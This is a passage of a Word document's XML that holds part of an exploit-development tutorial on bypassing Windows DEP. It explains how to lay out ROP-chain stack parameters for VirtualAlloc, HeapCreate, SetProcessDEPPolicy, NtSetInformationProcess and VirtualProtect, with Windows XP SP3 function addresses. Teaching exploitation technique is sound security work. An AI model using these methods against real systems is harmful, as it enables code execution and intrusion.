        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">pointer to memcpy  (return address field of VirtualAlloc()). When VirtualAlloc ends, it will return to this address </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">lpAddress : arbitrary address (where to allocate new memory. Example 0x00200000) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">size (how big should new memory allocation be) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">flAllocationType (0x1000 : MEM_COMMIT) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">flProtect (0x40 :  PAGE_EXECUTE_READWRITE) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Arbitrary address (same address as lpAddress, this param here will used to jump to shellcode after memcpy() returns). This field is the first parameter to the memcpy() function </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Arbitrary address (again, same address as lpAddress. Parameter here will be used as destination address for memcpy() ). This field is the second parameter to the memcpy() function </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Address of shellcode ( = source parameter for memcpy()). This will be the 3rd parameter to the memcpy() function </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Size : size parameter for memcpy(). This is the last parameter for the memcpy() function </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The key is obviously to find a reliable address (address where to allocate memory) and produce all parameters on the stack using rop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When this chain ends, you will end up executing the code which was copied to the newly allocated memory earlier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>HeapCreate()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-us/library/aa366599(VS.85).aspx</w:t>
        </w:r>
      </w:hyperlink>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HANDLE WINAPI HeapCreate(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DWORD flOptions,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SIZE_T dwInitialSize,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SIZE_T dwMaximumSize</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function will create a private heap that can be used in our exploit.  Space will be reserved in the virtual address space of the process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the flOptions parameter is set to 0x00040000 (HEAP_CREATE_ENABLE_EXECUTE), then all memory blocks that are allocated from this heap, will allow for code execution, even if DEP is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Parameter dwInitialSize must contain a value that indicates the initial size of the heap, in bytes. If you set this parameter to 0, then one page will be allocated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The dwMaximumSize parameter refers to the maximum size of the heap, in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function, will only create a private heap and mark it as executable. You still to allocate memory in this heap (with HeapAlloc for example) and then copy the shellcode to that heap location (with memcpy() for example)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the CreateHeap function returns, a pointer to the newly created heap will be stored in eax. You will need this value to issue a HeapAlloc() call :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-us/library/aa366597(v=VS.85).aspx</w:t>
        </w:r>
      </w:hyperlink>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LPVOID WINAPI HeapAlloc(</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HANDLE hHeap,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DWORD dwFlags,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SIZE_T dwBytes</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When new heap memory was allocated, you can use memcpy() to copy your shellcode into the allocated heap and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On XP SP3, HeapCreate is located at 0x7C812C56. HeapAlloc() is located at 7C8090F6. Both functions are part of kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SetProcessDEPPolicy()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-us/library/bb736299(VS.85).aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Works for : Windows XP SP3, Vista SP1 and Windows 2008. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order for this function to work, the current DEP Policy must be set to OptIn or OptOut. If the policy is set to AlwaysOn (or AlwaysOff), then SetProcessDEPPolicy will throw an error. If a module is linked with /NXCOMPAT, the technique will not work either.   Finally and equally important, it can only be called for the process just once.  So if this function has already been called in the current process (IE8 for example, already calls it when the process starts), then it won’t work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Bernardo Damele wrote an excellent blog post about this topic : </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html</w:t>
        </w:r>
      </w:hyperlink>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BOOL WINAPI SetProcessDEPPolicy(</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DWORD dwFlags</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function requires one parameter, and this parameter must be set to 0 to disable DEP for the current process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to use this function in a ROP chain, you need to set up the stack like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">pointer to SetProcessDEPPolicy() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">pointer to shellcode </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">zero </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The "pointer to shellcode" will make sure the chain will jump to the shellcode when the SetProcessDEPPolicy() was executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The address of SetProcessDEPPolicy() on XP SP3 is 7C8622A4 (kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>NtSetInformationProcess()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Works for : Windows XP, Vista SP0, Windows 2003</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Technique documented by skape and skywing : </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://uninformed.org/index.cgi?v=2&amp;a=4</w:t>
        </w:r>
      </w:hyperlink>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NtSetInformationProcess(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NtCurrentProcess(),    // (HANDLE)-1</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ProcessExecuteFlags,   // 0x22</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&amp;ExecuteFlags,         // ptr to 0x2</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 xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sizeof(ExecuteFlags)); // 0x4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Using this function will require you to have 5 parameters on the stack :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2164"/>
        <w:gridCol w:w="7474"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164"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Return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7474"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Value to be generated, indicates where function needs to return to (= location where your shellcode is placed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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NtCurrentProcess()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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Static value, set to 0xFFFFFFFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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ProcessExecuteFlags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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Static value, set to 0x22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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&amp;ExecuteFlags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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Pointer to 0x2 (value can be static, might be dynamic as well). This address has to point to a memory location that contains 0x00000002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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sizeOf(ExecuteFlags)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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Static value, set to 0x4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The NtSetInformationProcess will fail if the permanent DEP flag is set.  On Vista (and later), this flag is set automatically for all executables linked with the /NXCOMPAT linker option.  The technique will also fail if the DEP policy mode is set to AlwaysOn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Alternatively, you can also use an existing routine in ntdll (which, in essence, will do the same, and it will have the parameters set up for you automatically).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On XP SP3, NtSetInformationProcess() is located at 7C90DC9E (ntdll.dll)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">As stated earlier, I already explained a possible way to use this technique in </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>tutorial 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>, but I will show another way to use this function in today’s tutorial.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VirtualProtect()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-us/library/aa366898(VS.85).aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The VirtualProtect function changes the access protection of memory in the calling process.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BOOL WINAPI VirtualProtect(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LPVOID lpAddress,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SIZE_T dwSize,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DWORD flNewProtect,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__out  PDWORD lpflOldProtect</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you want to use this function, you will have to put 5 parameters on the stack :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1504"/>
        <w:gridCol w:w="8134"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1504"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Return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8134"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pointer to the location where VirtualProtect() needs to return to. This will be the address of your shellcode on the stack (dynamically created value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="150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lpAddress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813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pointer to the base address of the region of pages whose access protection attributes need to be changed. In essence, this will be the base address of your shellcode on the stack (dynamically created value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="150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dwsize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813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number of bytes (dynamically created value, making sure the entire shellcode can get executed. If the shellcode will expand for some reason (because of decoding for example), then those additional bytes will need to be taken into account and accounted for.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="150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flNewProtect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813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option that specifies the new protection option : 0x00000040 : PAGE_EXECUTE_READWRITE. If your shellcode will not modify itself (decoder for example), then a value of 0x00000020 (PAGE_EXECUTE_READ) might work as well</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="150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lpflOldProtect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813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pointer to variable that will receive the previous access protection value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Note : The memory protection constants that can be used in VirtualProtect() can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On XP SP3, VirtualProtect() is located at 0x7C801AD4 (kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WriteProcessMemory()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
